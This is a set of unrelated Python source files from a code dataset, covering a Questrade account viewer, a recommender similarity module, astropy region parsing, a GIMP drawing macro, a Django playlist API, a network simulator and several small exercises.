\nprint('')\nprint(str(symbolIdList))\nprint('')\nquotes = market.Quotes(symbolIdList)\nfor quote in quotes.quoteList:\n print(str(quote[qtD.Quotes.symbol]) + ' last trade price: ' + str(quote[qtD.Quotes.lastTradePrice]))\n \n\n\n\nkey = Token()\nprint(key.call_header())\nprint(key.api_server())\nprint(key.server_time())\n\n\nacct = Account.AccountList()\nprint(acct.userId)\n\n\nbalances =[]\n\nfor i in range(acct.accountQty):\n index = (i)\n print('index',index)\n print('type', acct.type[index])\n print('account', str(acct.number[index]))\n print('')\n balances.append(Account.AccountBalances(acct.number[index]))\n\n\n\nroot = Tk()\n\n\ndef OnReleaseClick(event):\n curritem = tree.selection()[0]\n statuslabel.config(text=\"you clicked on \" + tree.item(curritem,\"text\"))\n try:\n values = tree.item(curritem, \"values\")[0]\n print(values)\n except:\n print('no values for AcctId')\n \n\n\ntree = Treeview(root, height = 5)\ntree.grid(row=0,column=0)\n\n\nn = Notebook(root, height=100, width = 300)\nn.grid(row=1,column=1)\nf1 = Frame(n) # first page, which would get widgets gridded into it\nf2 = Frame(n) # second page\nn.add(f1, text='One')\nn.add(f2, text='Two')\nn.grid(row=2)\n\nf1button= Button(f1, text=\"test\", callback=None)\nf1button.grid(row=0,column=0)\n\nroot.wm_state('zoomed')\n\n\n\nprint(root.maxsize())\n\n\n \n# Inserted at the root, program chooses id:\ntree[\"columns\"] = (\"AcctId\",\"CAD\",\"USD\")\n\ntree.column(\"AcctId\", width = 100)\ntree.heading(\"AcctId\",text=\"AcctID\")\ntree.column(\"AcctId\", anchor=\"center\") \n\ntree.column(\"CAD\", width=100)\ntree.heading(\"CAD\", text=\"CAD\")\ntree.column(\"CAD\", anchor=\"center\")\n \ntree.column(\"USD\", width = 100)\ntree.heading(\"USD\",text=\"USD\")\ntree.column(\"USD\", anchor=\"center\") \n\nfor i in range(acct.accountQty):\n index = (i) \n tree.insert('', 'end', acct.type[index],text=acct.type[index], \n values=(\n acct.number[index],\n '$1,000', #+ '{:7,.2f}'.format(balances[index].combinedBalances[0]['cash']),\n '$2,000' #+ '{:7,.2f}'.format(balances[index].combinedBalances[1]['cash'])\n )\n )\n \n #tree.insert(acct.type[index], 'end',qtD.Accounts.isbilling+str(acct.number[index]), text = 'Is Billing: ' + str(acct.isBilling[index]))\n #tree.insert(acct.type[index], 'end', qtD.Accounts.isprimary+str(acct.number[index]), text = 'Is Primary: ' + str(acct.isPrimary[index]))\n #tree.insert(acct.type[index], 'end', qtD.Accounts.client_account_type+acct.number[index], text = 'Client Account Type: ' + acct.clientAccountType[index])\n\n\ntree.bind(\"\", OnReleaseClick)\n\n\ntree.column('#0',width=90)\ntree.heading('#0', text='Type')\nstatuslabel = Label(root, bd=1, relief=SUNKEN, anchor=W)\nstatuslabel.config(text='test status bar', width =75)\nstatuslabel.grid(row=3, columnspan = 2)\n\nroot.update()\nmainloop()\n\n\n \n\n","sub_path":"QuestradeAPI/src/questrade/classtest.py","file_name":"classtest.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"40660251","text":"try:\n import pprint\n import pickle\n import math as mat\nexcept ImportError:\n print(\"Incomplete libraries, unable to proceed\")\n\n#打开由fp.py生成的pickle对象文件\ntry:\n with open('data.pkl','rb') as f:\n print('Success opening data.pkl')\n try:\n user_tags = pickle.load(f)\n print('Success fetching data from file')\n except IOError:\n print('Cannot fetch data from file')\nexcept IOError:\n print('Cannot open data files')\n\nprint(user_tags)\n\nwith 
open('user_list.pkl','rb') as f:\n user_list = pickle.load(f)\n\nprint(user_list)\nprint(len(user_list))\n\n# Pearson correlation coefficient\n\ndef pearson(rating1,rating2):\n sum_xy = 0\n sum_x = 0\n sum_y = 0\n sum_x2 = 0\n sum_y2 = 0\n n = 0\n for key in rating1:\n if key in rating2:\n n += 1\n x = rating1[key]\n y = rating2[key]\n sum_xy += x*y\n sum_x += x\n sum_y += y\n sum_x2 += x**2\n sum_y2 += y**2\n # return 0 if there are no common tags\n if n == 0:\n return 0\n # compute the denominator\n denominator = mat.sqrt(sum_x2 - (sum_x**2)/n) * mat.sqrt(sum_y2-(sum_y**2)/n)\n if denominator == 0:\n return 0\n else:\n return (sum_xy-(sum_x*sum_y)/n)/denominator\n\n#Minkowski Distance Function\ndef minkowski(rating1,rating2,r):\n distance = 0\n commonRatings = False\n for key in rating1:\n if key in rating2:\n distance += pow(abs(rating1[key] - rating2[key]),r)\n commonRatings = True\n if commonRatings:\n return pow(distance,1/r)\n else:\n return 0 # no common tags\n\n","sub_path":"Finales/recomand.py","file_name":"recomand.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"9643151","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom __future__ import absolute_import, division, print_function\nfrom collections import OrderedDict\nfrom warnings import warn\n\nfrom astropy import units as u\nfrom astropy import coordinates\nfrom astropy.coordinates import BaseCoordinateFrame\nfrom astropy import log\n\n__all__ = ['ShapeList', 'Shape']\n\nfrom .. import shapes\nfrom ..core import PixCoord\nfrom .ds9.core import DS9RegionParserWarning, DS9RegionParserError\nfrom .crtf.core import CRTFRegionParserWarning, CRTFRegionParserError\n\n\nclass ShapeList(list):\n \"\"\"\n List of Shape\n \"\"\"\n def to_regions(self):\n regions = list()\n for shape in self:\n # Skip elliptical annulus for now\n if shape.region_type == 'ellipse' and len(shape.coord) > 5:\n msg = 'Skipping elliptical annulus {}'.format(shape)\n warn(msg, DS9RegionParserWarning)\n continue\n log.debug(shape)\n region = shape.to_region()\n log.debug(region)\n regions.append(region)\n return regions\n\n\nclass Shape(object):\n \"\"\"\n Helper class to represent a DS9/CRTF Region.\n\n This serves as an intermediate step in the parsing process.\n\n Parameters\n ----------\n format_type : str\n File Format type\n coordsys : str\n Coordinate system\n region_type : str\n Region type\n coord : list of `~astropy.coordinates.Angle` or `~astropy.units.Quantity`\n Coordinates\n meta : dict\n Meta attributes\n composite : bool\n Composite region\n include : bool\n Include/exclude region\n \"\"\"\n\n shape_to_sky_region = {'DS9': dict(circle=shapes.CircleSkyRegion,\n ellipse=shapes.EllipseSkyRegion,\n box=shapes.RectangleSkyRegion,\n polygon=shapes.PolygonSkyRegion,\n annulus=shapes.CircleAnnulusSkyRegion,\n line=shapes.LineSkyRegion,\n point=shapes.PointSkyRegion\n ),\n\n 'CRTF': dict(circle=shapes.CircleSkyRegion,\n ellipse=shapes.EllipseSkyRegion,\n centerbox=shapes.RectangleSkyRegion,\n rotatedbox=shapes.RectangleSkyRegion,\n poly=shapes.PolygonSkyRegion,\n annulus=shapes.CircleAnnulusSkyRegion,\n line=shapes.LineSkyRegion,\n point=shapes.PointSkyRegion)\n }\n shape_to_pixel_region = {'DS9': dict(circle=shapes.CirclePixelRegion,\n ellipse=shapes.EllipsePixelRegion,\n box=shapes.RectanglePixelRegion,\n polygon=shapes.PolygonPixelRegion,\n annulus=shapes.CircleAnnulusPixelRegion,\n line=shapes.LinePixelRegion,\n point=shapes.PointPixelRegion\n ),\n\n 'CRTF': dict(circle=shapes.CirclePixelRegion,\n 
ellipse=shapes.EllipsePixelRegion,\n centerbox=shapes.RectanglePixelRegion,\n rotatedbox=shapes.RectanglePixelRegion,\n poly=shapes.PolygonPixelRegion,\n annulus=shapes.CircleAnnulusPixelRegion,\n line=shapes.LinePixelRegion,\n point=shapes.PointPixelRegion\n )\n }\n\n error = {'DS9': DS9RegionParserError, 'CRTF': CRTFRegionParserError}\n warning = {'DS9': DS9RegionParserWarning, 'CRTF': CRTFRegionParserWarning}\n\n def __init__(self, format_type, coordsys, region_type, coord, meta, composite, include):\n\n from . import CRTFRegionParser, DS9Parser\n self.parser = {'DS9': DS9Parser, 'CRTF': CRTFRegionParser}\n\n self.format_type = format_type\n self.coordsys = coordsys\n self.region_type = region_type\n self.coord = coord\n self.meta = meta\n self.composite = composite\n self.include = include\n\n def __str__(self):\n ss = self.__class__.__name__\n ss += '\\nFormat Type : {}'.format(self.format_type)\n if self.format_type == 'CRTF':\n ss += '\\nType : {}'.format(self.meta.get('type', 'reg'))\n ss += '\\nCoord sys : {}'.format(self.coordsys)\n ss += '\\nRegion type : {}'.format(self.region_type)\n if self.region_type == 'symbol':\n ss += '\\nSymbol : {}'.format(self.meta['symbol'])\n if self.region_type == 'text':\n ss += '\\nText : {}'.format(self.meta['string'])\n ss += '\\nCoord: {}'.format(self.coord)\n ss += '\\nMeta: {}'.format(self.meta)\n ss += '\\nComposite: {}'.format(self.composite)\n ss += '\\nInclude: {}'.format(self.include)\n ss += '\\n'\n return ss\n\n def convert_coords(self):\n \"\"\"\n Process list of coordinates\n\n This mainly seaches for tuple of coordinates in the coordinate list and\n creates a SkyCoord or PixCoord object from them if appropriate for a\n given region type. This involves again some coordinate transformation,\n so this step could be moved to the parsing process\n \"\"\"\n if self.coordsys in self.parser[self.format_type].coordsys_mapping:\n coords = self._convert_sky_coords()\n else:\n coords = self._convert_pix_coords()\n\n if self.region_type == 'line':\n coords = [coords[0][0], coords[0][1]]\n\n return coords\n\n def _convert_sky_coords(self):\n \"\"\"\n Convert to sky coords\n \"\"\"\n parsed_angles = [(x, y)\n for x, y in zip(self.coord[:-1:2], self.coord[1::2])\n if (isinstance(x, coordinates.Angle) and\n isinstance(y, coordinates.Angle))\n ]\n frame = coordinates.frame_transform_graph.lookup_name(self.coordsys)\n\n lon, lat = zip(*parsed_angles)\n if hasattr(lon, '__len__') and hasattr(lat, '__len__') and len(lon) == 1 and len(lat) == 1:\n # force entries to be scalar if they are length-1\n lon, lat = u.Quantity(lon[0]), u.Quantity(lat[0])\n else:\n # otherwise, they are vector quantities\n lon, lat = u.Quantity(lon), u.Quantity(lat)\n sphcoords = coordinates.UnitSphericalRepresentation(lon, lat)\n coords = [frame(sphcoords)]\n\n if self.region_type != 'polygon':\n coords += self.coord[len(coords * 2):]\n\n return coords\n\n def _convert_pix_coords(self):\n \"\"\"\n Convert to pixel coordinates, `regions.PixCoord`\n \"\"\"\n if self.region_type in ['polygon', 'line', 'poly']:\n # have to special-case polygon in the phys coord case\n # b/c can't typecheck when iterating as in sky coord case\n coords = [PixCoord(self.coord[0::2], self.coord[1::2])]\n else:\n temp = [_.value for _ in self.coord]\n coord = PixCoord(temp[0], temp[1])\n coords = [coord] + temp[2:]\n\n return coords\n\n def to_region(self):\n \"\"\"\n Convert to region object\n \"\"\"\n\n coords = self.convert_coords()\n log.debug(coords)\n viz_keywords = ['color', 'dashed', 'width', 
'point', 'font', 'symsize', 'symsize', 'fontsize', 'fontstyle',\n 'usetex', 'labelpos', 'labeloff', 'linewidth', 'linestyle']\n\n if isinstance(coords[0], BaseCoordinateFrame):\n reg = self.shape_to_sky_region[self.format_type][self.region_type](*coords)\n elif isinstance(coords[0], PixCoord):\n reg = self.shape_to_pixel_region[self.format_type][self.region_type](*coords)\n else:\n self._raise_error(\"No central coordinate\")\n\n reg.visual = OrderedDict()\n reg.meta = OrderedDict()\n for key in self.meta.keys():\n if key in viz_keywords:\n reg.visual[key] = self.meta[key]\n else:\n reg.meta[key] = self.meta[key]\n reg.meta['include'] = self.include\n return reg\n\n def _raise_error(self, msg):\n raise self.error[self.format_type](msg)\n","sub_path":"regions/io/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"441878107","text":"'''\n20.顺时针打印矩阵\n考虑矩阵为空的情况\n参数:矩阵、圈数标记、矩阵行数、矩阵列数、最终结果\n第二个函数中的两条if判断是为了防止单行或单列的情况,当打印半圈后会重复往回打印\n'''\ndef printMatrix(matrix):\n\trows = len(matrix) - 1\n\tcols = len(matrix[0]) - 1\n\tif not matrix:\n\t\treturn None\n\tstart = 0\t\t\t#圈数标记,从0开始\n\tres = []\n\twhile start * 2 <= rows and start * 2 <= cols:\n\t\tprint_circle(matrix, start, rows, cols, res)\n\t\tstart += 1\n\treturn res\ndef print_circle(matrix, start, rows, cols, res):\n\tendR = rows - start \t#最后一行标记\n\tendC = cols - start\t\t#最后一列标记\n\tfor c in range(start, endC+1):\n\t\tres.append(matrix[start][c])\n\tfor r in range(start+1, endR+1):\n\t\tres.append(matrix[r][endC])\n\tif start < endR and start < endC:\n\t\tfor c in range(endC-1, start-1, -1):\n\t\t\tres.append(matrix[endR][c])\n\tif start < endR and start < endC:\n\t\tfor r in range(endR-1, start, -1):\n\t\t\tres.append(matrix[r][start])\nif __name__ == '__main__':\n\tarr = [[1]]\n\tarr2 = [[1,2],\n\t\t\t[3,4]]\n\tarr3 = [[1,2,3,4,5],\n\t\t\t[6,7,8,9,10],\n\t\t\t[11,12,13,14,15],\n\t\t\t[16,17,18,19,20],\n\t\t\t[21,22,23,24,25]]\n\tarr4 = [[1],[2],[3],[4]]\n\tarr5 = [[1,2,3,4,5]]\n\tprint(printMatrix(arr))\n\tprint(printMatrix(arr2))\n\tprint(printMatrix(arr3))\n\tprint(printMatrix(arr4))\n\tprint(printMatrix(arr5))\n","sub_path":"数据结构与算法/剑指offer/20.顺时针打印矩阵.py","file_name":"20.顺时针打印矩阵.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"336195634","text":"\"\"\"\nSimilar to the concept of the global keyword, which we have seen in the section above,\nwe can use the keyword nonlocal inside the inner function to explicitly access a variable\nfrom the outer (enclosed) scope in order to modify its value.\n\nNote that the nonlocal keyword was added in Python 3.x and is not implemented in Python 2.x (yet)\n\"\"\"\n\n\na_var = 'global value'\n\n\ndef outer():\n a_var = 'local value'\n print('outer before:', a_var)\n\n def inner():\n nonlocal a_var\n a_var = 'inner value'\n print('in inner():', a_var)\n\n inner()\n print(\"outer after:\", a_var)\n\nouter()\n","sub_path":"LEGB/2_LEG/2_2_nonlocal.py","file_name":"2_2_nonlocal.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"359516083","text":"from macromanx import Mouse, Keyboard, Winman, Aux\nfrom subprocess import call\nimport sys\nfrom math import sqrt\n\nx,y = Aux.displayinfo()\n\nif not Winman.spinfocus(\"GNU Image Manipulation Program\", 60):\n print(\"Window not acquired.\")\n 
sys.exit(-1)\n\n# \ncall([\"notify-send\", \"Hands off the keyboard. The test begins in 3 seconds.\"])\nAux.wait(3, \"s\")\n\nprint(\"Debug info:\")\nprint(\"Making a new canvas.\")\nKeyboard.keycombo([\"Control_L\"], \"n\")\n\nif not Winman.spinfocus(\"New Image\"):\n sys.exit(1)\nKeyboard.keycombo([\"Alt_L\"], \"w\")\nKeyboard.typestring(\"500\")\nKeyboard.keycombo([\"Alt_L\"], \"e\")\nKeyboard.typestring(\"550\")\nKeyboard.hitkey(\"Return\")\n\nprint(\"Setting up canvas:\")\nif not Winman.spinfocus(\"500x550\"):\n sys.exit(2)\nKeyboard.hitkey(\"F11\")\nKeyboard.hitkey(\"1\")\nMouse.move(x/2, y/2)\n# Normalize screen bounds:\nMouse.click(5)\nMouse.click(4)\nKeyboard.keydown(\"Shift_L\")\nMouse.click(5)\nMouse.click(4)\nKeyboard.keyup(\"Shift_L\")\n\nprint(\"Drawing a smile.\")\n# At this point, mouse should be at 259,251 on canvas\nKeyboard.hitkey(\"p\")\nfor i in range(5):\n Keyboard.hitkey(\"]\")\n# Left eye: 158,172\nMouse.rclick(158-259, 172-251)\n# Right eye: 354,181\nMouse.rclick(354-158, 181-172)\n# Smile: Arc from 100,328 to 389,328\nMouse.rmove(100-354, 328-181)\ncurx,cury = Mouse.getmousepos()\nsave=(curx, cury)\nMouse.clickhold()\nfor i in range(0,151):\n Mouse.move(curx+i, cury+sqrt(11*i/2))\nfor i in range(151, 300):\n Mouse.move(curx+i, cury+sqrt(11*(300-i)/2))\nMouse.clickunhold()\nfor i in range(5):\n Keyboard.hitkey(\"[\")\n# Text at 171,461\nprint(\"Drawing message.\")\nMouse.move(save[0], save[1])\nKeyboard.hitkey(\"t\")\nMouse.rclick(80, 100)\nKeyboard.typestring(\"Have a nice day.\")\nKeyboard.hitkey(\"Escape\")\nKeyboard.keycombo([\"Alt_L\"], \"l\")\nKeyboard.hitkey(\"w\")\n\nKeyboard.hitkey(\"F11\")\n# Give it time:\nAux.wait(200)\n# Normalize screen bounds:\nMouse.click(5)\nMouse.click(5)\nMouse.click(4)\nMouse.click(4)\nKeyboard.keydown(\"Shift_L\")\nMouse.click(5)\nMouse.click(5)\nMouse.click(4)\nMouse.click(4)\nKeyboard.keyup(\"Shift_L\")\n\nWinman.focuson(\"python unit_tester.py\")\n\ncall([\"notify-send\", \"Test complete.\"])\n","sub_path":"samples/draw_tester.py","file_name":"draw_tester.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"563879745","text":"import glob\nimport pickle\nimport os\nfrom helper_functions import *\nfrom data_structure import *\n\n### TODO: Tweak these parameters and see how the results change.\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = 'ALL' # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [None, None] # Min and max in y to search in slide_window()\nhist_range=(0, 256)\n\ndef readData(pickle_file = 'data_images_features.p'):\n\n # files\n cars = glob.glob('./vehicles/GTI_Far/*.png')\n cars += glob.glob('./vehicles/GTI_MiddleClose/*.png')\n cars += glob.glob('./vehicles/GTI_Left/*.png')\n cars += glob.glob('./vehicles/GTI_Right/*.png')\n cars += glob.glob('./vehicles/KITTI_extracted/*.png')\n not_cars = glob.glob('./non-vehicles/Extras/*.png')\n not_cars += glob.glob('./non-vehicles/GTI/*.png')\n\n # get features (shuffled, separate into train/test and normalized features)\n # extract combined color and HOG features\n examples_features = 
extract_features(cars, cspace=color_space, spatial_size=spatial_size, hist_bins=hist_bins, hist_range=hist_range, orient=orient,\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, hog_channel=hog_channel)\n\n not_examples_features = extract_features(not_cars, cspace=color_space, spatial_size=spatial_size, hist_bins=hist_bins, hist_range=hist_range, orient=orient,\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, hog_channel=hog_channel)\n\n # Save the data for easy access\n print('Saving data to pickle file...')\n try:\n with open(pickle_file, 'wb') as pfile:\n pickle.dump(\n {\n 'cars': cars,\n 'not_cars': not_cars,\n 'examples_features': examples_features,\n 'not_examples_features': not_examples_features,\n 'color_space': color_space,\n 'orient': orient,\n 'pix_per_cell': pix_per_cell,\n 'cell_per_block': cell_per_block,\n 'hog_channel': hog_channel,\n 'spatial_size': spatial_size,\n 'hist_bins': hist_bins,\n 'spatial_feat': spatial_feat,\n 'hist_feat': hist_feat,\n 'hog_feat': hog_feat,\n 'y_start_stop': y_start_stop,\n 'hist_range': hist_range\n },\n pfile, pickle.HIGHEST_PROTOCOL)\n except Exception as e:\n print('Unable to save data to', pickle_file, ':', e)\n raise\n\n print('Data cached in pickle file.')\n\n return cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range\n\ndef loadData(data_file = 'data_images_features.p'):\n with open(data_file, mode='rb') as f:\n data = pickle.load(f)\n cars = data['cars']\n not_cars = data['not_cars']\n examples_features = data['examples_features']\n not_examples_features = data['not_examples_features']\n color_space = data['color_space']\n orient = data['orient']\n pix_per_cell = data['pix_per_cell']\n cell_per_block = data['cell_per_block']\n hog_channel = data['hog_channel']\n spatial_size = data['spatial_size']\n hist_bins = data['hist_bins']\n spatial_feat = data['spatial_feat']\n hist_feat = data['hist_feat']\n hog_feat = data['hog_feat']\n y_start_stop = data['y_start_stop']\n hist_range = data['hist_range']\n\n return cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range\n\ndef setup(f = './data_images_features.p'):\n # load data\n if (os.path.exists(f)):\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = loadData(f)\n else:\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = readData(f)\n\n features_train, features_test, labels_train, labels_test, X_scaler = norm_shuffle(cars, not_cars, examples_features, not_examples_features)\n\n data = dataStructure(features_train, features_test, labels_train, labels_test, X_scaler, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range)\n\n # train\n # color, spatial: Test Accuracy of SVC = 0.9181, 0.01135 Seconds to predict 10 labels with SVC\n # color, spatial, hog0: Test Accuracy of SVC = 0.9716, 0.01754 Seconds to predict 10 labels with SVC\n # color, spatial, hogAll: Test 
Accuracy of SVC = 0.9797, 0.0286 Seconds to predict 10 labels with SVC\n clf = train_SVM_LinearSVC(data, True)\n\n # color, spatial: Test Accuracy of DT = 0.9077, 0.01928 Seconds to predict 10 labels with DT\n # color, spatial, hog0: Test Accuracy of DT = 0.9223, 0.03695 Seconds to predict 10 labels with DT\n # color, spatial, hogAll: Test Accuracy of DT = 0.92, 0.05914 Seconds to predict 10 labels with DT\n #clf = train_decision_tree(data, True)\n\n return clf, data\n\nif __name__ == \"__main__\":\n f = data_file = 'data_images_features.p'\n if(os.path.exists(f)):\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = loadData(f)\n else:\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = readData(f)\n\n print('Number of samples of cars: ', len(examples_features))\n print('Number of samples of not cars: ',len(not_examples_features))\n","sub_path":"process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"624974676","text":"from django.conf.urls import url\nfrom django.utils.text import slugify\nfrom tastypie import resources, fields\nfrom tastypie.authentication import Authentication\nfrom tastypie.authorization import Authorization\nfrom tastypie.exceptions import BadRequest\n\nfrom .adapters import parse_url, InvalidNetworkUrl, NetworkNotSupported\nfrom .models import Playlist, PlaylistItem\nfrom .utils import randhash\n\n\nclass PlaylistResource(resources.ModelResource):\n class Meta:\n authentication = Authentication()\n authorization = Authorization()\n queryset = Playlist.objects.all()\n resource_name = 'playlists'\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post', ]\n always_return_data = True\n filtering = {\n \"slug\": resources.ALL,\n \"token\": resources.ALL\n }\n\n def hydrate(self, bundle):\n if not bundle.obj.pk:\n bundle.data[\"id\"] = randhash()\n bundle.data[\"token\"] = randhash(30)\n return bundle\n\n def hydrate_slug(self, bundle):\n bundle.data[\"slug\"] = slugify(bundle.data[\"name\"])\n return bundle\n\n\nclass PlaylistItemResource(resources.ModelResource):\n playlist_id = fields.ForeignKey(PlaylistResource, 'playlist')\n\n class Meta:\n authentication = Authentication()\n authorization = Authorization()\n queryset = PlaylistItem.objects.all()\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post', ]\n resource_name = 'playlist-items'\n filtering = {\n \"playlist_id\": resources.ALL_WITH_RELATIONS\n }\n ordering = [\"created_at\"]\n always_return_data = True\n\n def hydrate(self, bundle):\n if not bundle.obj.pk: # creation\n try:\n tid, title, url, network = parse_url(bundle.data[\"url\"])\n except KeyError:\n raise BadRequest(\"Missing url key in data.\")\n except (InvalidNetworkUrl, NetworkNotSupported) as e:\n raise BadRequest(e)\n\n bundle.data[\"network_id\"] = tid\n bundle.data[\"title\"] = title\n bundle.data[\"url\"] = url\n bundle.data[\"network\"] = network\n return bundle\n\n def base_urls(self):\n \"\"\"\n Override the base urls to include the playlist id directly.\n \"\"\"\n return [\n url(\n r\"^playlists/(?P<playlist_id>\w+)/(?P<resource_name>%s)/$\" % self._meta.resource_name,\n 
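 # List endpoint: all items of one playlist (the detail route with a pk follows below).\n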
self.wrap_view('dispatch_list'),\n name=\"api_dispatch_list\"\n ),\n url(\n r\"^playlists/(?P<playlist_id>\w+)/(?P<resource_name>%s)/(?P<pk>\d+)$\" % self._meta.resource_name,\n self.wrap_view('dispatch_detail'),\n name=\"api_dispatch_detail\"\n )\n ]\n","sub_path":"ourplaylists/app/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"501527331","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom simulator.file_parser import FileParser\nfrom simulator.network.arp_packet import ArpReply, ArpRequest\nfrom simulator.network.echo_packet import EchoReply, EchoRequest\n\n\nclass Simulator:\n def __init__(self, filename):\n parser = FileParser(self, filename)\n self.routers, self.mac_dict = parser.parse_file()\n\n def find_node(self, node_name):\n for router in self.routers:\n for port in router.ports:\n for connected in port.connected:\n if connected.name == node_name:\n return connected\n return None\n\n def connect(self, node_list):\n for i in range(0, len(node_list)-1):\n source = self.find_node(node_list[i])\n destination = self.find_node(node_list[i+1])\n if source is None:\n raise Exception(\"Node {name} not found\".format(name=node_list[i]))\n if destination is None:\n raise Exception(\"Node {name} not found\".format(name=node_list[i+1]))\n source.echo_request(destination.ip_address.ip)\n\n def parse_command(self, command):\n if isinstance(command, EchoRequest):\n if command.ttl == 0:\n exit(1)\n result = str(command).replace(\"src_host\", self.mac_dict[command.src_mac])\n if command.dst_mac is not None:\n result = result.replace(\"dst_host\", self.mac_dict[command.dst_mac])\n print(result)\n\nsim = Simulator(sys.argv[1])\nsim.connect(sys.argv[2:])\n","sub_path":"simulator/net_simulator.py","file_name":"net_simulator.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"14510603","text":"import multiprocessing\nfrom multiprocessing import Lock\nimport random\n# Py3\n\n\ndef detect_lost_number(n):\n if n in [4, 6, 15, 16, 23, 42]:\n print(\"%d is valid\" % (n,))\n else:\n print(\"Received %d\" % (n,))\n return n\n\n\ndef generate_random_number():\n number = random.choice(range(100))\n return number\n\n\ndef detector_process(pipe_conn, lock):\n # Receives n and evaluates it\n while True:\n n = pipe_conn.recv()\n detect_lost_number(n)\n lock.release()\n\n\ndef generator_process(pipe_conn, lock):\n while True:\n lock.acquire()\n n = generate_random_number()\n print(\"Sending %d\" % (n, ))\n pipe_conn.send(n)\n\n\ndef main():\n lock = Lock() # synchronize the two processes\n parent_conn, child_conn = multiprocessing.Pipe()\n generator = multiprocessing.Process(target=generator_process,\n args=(child_conn, lock, ))\n detector = multiprocessing.Process(target=detector_process,\n args=(parent_conn, lock, ))\n generator.start()\n detector.start()\n generator.join()\n detector.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ipc/detecting_numbers.py","file_name":"detecting_numbers.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"407727522","text":"# Problem Statement\r\n'''\r\nTeleCall uses 4 centers around the globe to process customer order forms. \r\nThey audit a certain % of the customer order forms. 
Any error in an order form renders it defective, and it has to be reworked before processing. \r\nThe manager wants to check whether the defective % varies by center. \r\nPlease analyze the data at the 5% significance level and help the manager draw appropriate inferences.\r\n'''\r\n\r\n# Solution\r\nalpha = 0.05 # From the problem statement\r\n\r\n# Importing necessary libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import stats\r\n\r\n# Load Costomer+OrderForm.csv as a pandas dataframe\r\nCustOrderForm = pd.read_csv('Costomer+OrderForm.csv')\r\n\r\n# View data\r\nprint(CustOrderForm.head())\r\n\r\n# print(CustOrderForm.describe())\r\n\r\n# Shape of dataframe\r\nprint(CustOrderForm.shape) # 300 rows and 4 columns\r\n\r\nfor columnName, columnData in CustOrderForm.items():\t# iteritems() was removed in pandas 2.0\r\n\tprint('\\n'+\"Value counts of column {}\".format(columnName))\r\n\tprint(columnData.value_counts())\r\n\r\n\r\n# Defining our Null and Alternate Hypothesis\r\nHo = 'Defective % across the centers is the same'\r\nHa = 'Defective % across the centers is not the same'\r\ndef chi_square(df):\r\n\t# Counts per center, taken from the value_counts() output above\r\n\terrorFree = [271, 267, 269, 280]\r\n\tDefective = [29, 33, 31, 20]\r\n\ttable = [errorFree, Defective]\r\n\t# print(table)\r\n\r\n\tstat, p, dof, expected = stats.chi2_contingency(table)\r\n\tp = round(p, 2)\r\n\r\n\tprint('\\n'+\"Inference from P Value\")\r\n\tif p>alpha:\r\n\t\tprint(\"{p} is greater than {alpha}. We fail to reject the Null Hypothesis. {Ho}\".format(p=p, alpha=alpha, Ho=Ho))\r\n\telse:\r\n\t\tprint(\"{p} is less than {alpha}. We reject the Null Hypothesis. {Ha}\".format(p=p, 